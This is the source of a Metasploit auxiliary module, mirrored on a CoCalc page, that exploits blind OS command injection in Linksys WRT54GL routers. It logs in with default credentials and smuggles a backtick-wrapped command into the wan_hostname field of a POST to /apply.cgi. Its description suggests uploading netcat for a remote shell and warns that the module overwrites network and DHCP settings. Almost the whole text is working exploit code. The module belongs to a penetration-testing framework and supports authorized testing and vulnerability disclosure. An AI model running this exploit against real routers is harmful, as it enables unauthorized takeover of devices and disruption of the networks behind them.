Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Linksys WRT54GL Remote Command Execution',
14
'Description' => %q{
15
Some Linksys Routers are vulnerable to OS Command injection.
16
You will need credentials to the web interface to access the vulnerable part
17
of the application.
18
Default credentials are always a good starting point. admin/admin or admin
19
and blank password could be a first try.
20
Note: This is a blind OS command injection vulnerability. This means that
21
you will not see any output of your command. Try a ping command to your
22
local system and observe the packets with tcpdump (or equivalent) for a first test.
23
24
Hint: To get a remote shell you could upload a netcat binary and exec it.
25
WARNING: this module will overwrite network and DHCP configuration.
26
},
27
'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
28
'License' => MSF_LICENSE,
29
'References' => [
30
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
31
[ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
32
[ 'EDB', '24202' ],
33
[ 'BID', '57459' ],
34
[ 'OSVDB', '89421' ]
35
],
36
'DisclosureDate' => '2013-01-18',
37
'Notes' => {
38
'Stability' => [CRASH_SAFE],
39
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
40
'Reliability' => []
41
}
42
)
43
)
44
45
register_options(
46
[
47
Opt::RPORT(80),
48
OptString.new('TARGETURI', [ true, 'PATH to OS Command Injection', '/apply.cgi']),
49
OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
50
OptString.new('HttpPassword', [ false, 'Password to login with', 'password']),
51
OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']),
52
OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']),
53
OptAddress.new('LANIP', [ false, 'LAN IP address of the router (default is RHOST)']),
54
OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']),
55
OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']),
56
OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500'])
57
]
58
)
59
end
60
61
# If the user configured LANIP, use it. Otherwise, use RHOST.
62
# NB: This presumes a dotted quad ip address.
63
def lan_ip
64
if datastore['LANIP'].to_s.empty?
65
datastore['RHOST']
66
else
67
datastore['LANIP']
68
end
69
end
70
71
def run
72
# setting up some basic variables
73
uri = datastore['TARGETURI']
74
user = datastore['HttpUsername']
75
rhost = datastore['RHOST']
76
netmask = datastore['NETMASK']
77
routername = datastore['ROUTER_NAME']
78
wandomain = datastore['WAN_DOMAIN']
79
wanmtu = datastore['WAN_MTU']
80
81
ip = lan_ip.split('.')
82
83
if datastore['HttpPassword'].nil?
84
pass = ''
85
else
86
pass = datastore['HttpPassword']
87
end
88
89
print_status("Trying to login with #{user} / #{pass}")
90
91
begin
92
res = send_request_cgi({
93
'uri' => uri,
94
'method' => 'GET',
95
'authorization' => basic_auth(user, pass)
96
})
97
98
unless (res.is_a? Rex::Proto::Http::Response)
99
vprint_error("#{rhost} not responding")
100
return :abort
101
end
102
103
if (res.code == 404)
104
print_error('Not Found page returned')
105
return :abort
106
end
107
108
if [200, 301, 302].include?(res.code)
109
print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
110
else
111
print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'")
112
return :abort
113
end
114
rescue ::Rex::ConnectionError
115
vprint_error("#{rhost} - Failed to connect to the web server")
116
return :abort
117
end
118
119
cmd = datastore['CMD']
120
121
print_status('Sending remote command: ' + cmd)
122
123
# cmd = Rex::Text.uri_encode(datastore['CMD'])
124
# original Post Request:
125
# data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&"
126
# data_cmd << "lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&"
127
# data_cmd << "wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&"
128
# data_cmd << "lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&"
129
# data_cmd << "lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&"
130
# data_cmd << "wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&"
131
# data_cmd << "wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&"
132
# data_cmd << "wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
133
134
vprint_status("using the following target URL: #{uri}")
135
136
begin
137
res = send_request_cgi({
138
'uri' => uri,
139
'method' => 'POST',
140
'authorization' => basic_auth(user, pass),
141
# 'data' => data_cmd,
142
143
'vars_post' => {
144
'submit_button' => 'index',
145
'change_action' => '1',
146
'submit_type' => '1',
147
'action' => 'Apply',
148
'now_proto' => 'dhcp',
149
'daylight_time' => '1',
150
'lan_ipaddr' => '4',
151
'wait_time' => '0',
152
'need_reboot' => '0',
153
'ui_language' => 'de',
154
'wan_proto' => 'dhcp',
155
'router_name' => routername.to_s,
156
'wan_hostname' => "`#{cmd}`",
157
'wan_domain' => wandomain.to_s,
158
'mtu_enable' => '1',
159
'wan_mtu' => wanmtu.to_s,
160
'lan_ipaddr_0' => ip[0].to_s,
161
'lan_ipaddr_1' => ip[1].to_s,
162
'lan_ipaddr_2' => ip[2].to_s,
163
'lan_ipaddr_3' => ip[3].to_s,
164
'lan_netmask' => netmask.to_s,
165
'lan_proto' => 'dhcp',
166
'dhcp_check' => '1',
167
'dhcp_start' => '100',
168
'dhcp_num' => '50',
169
'dhcp_lease' => '0',
170
'wan_dns' => '4',
171
'wan_dns0_0' => '0',
172
'wan_dns0_1' => '0',
173
'wan_dns0_2' => '0',
174
'wan_dns0_3' => '0',
175
'wan_dns1_0' => '0',
176
'wan_dns1_1' => '0',
177
'wan_dns1_2' => '0',
178
'wan_dns1_3' => '0',
179
'wan_dns2_0' => '0',
180
'wan_dns2_1' => '0',
181
'wan_dns2_2' => '0',
182
'wan_dns2_3' => '0',
183
'wan_wins' => '4',
184
'wan_wins_0' => '0',
185
'wan_wins_1' => '0',
186
'wan_wins_2' => '0',
187
'wan_wins_3' => '0',
188
'time_zone' => '-08+1+1',
189
'_daylight_time' => '1'
190
}
191
})
192
rescue ::Rex::ConnectionError
193
vprint_error("#{rhost} - Failed to connect to the web server")
194
return :abort
195
end
196
197
if res && (res.code == 200)
198
print_status('Blind Exploitation - Response expected')
199
else
200
print_error("Blind Exploitation - Response don't expected")
201
end
202
print_status('Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed')
203
print_status('Blind Exploitation - unknown Exploitation state')
204
end
205
end
206
207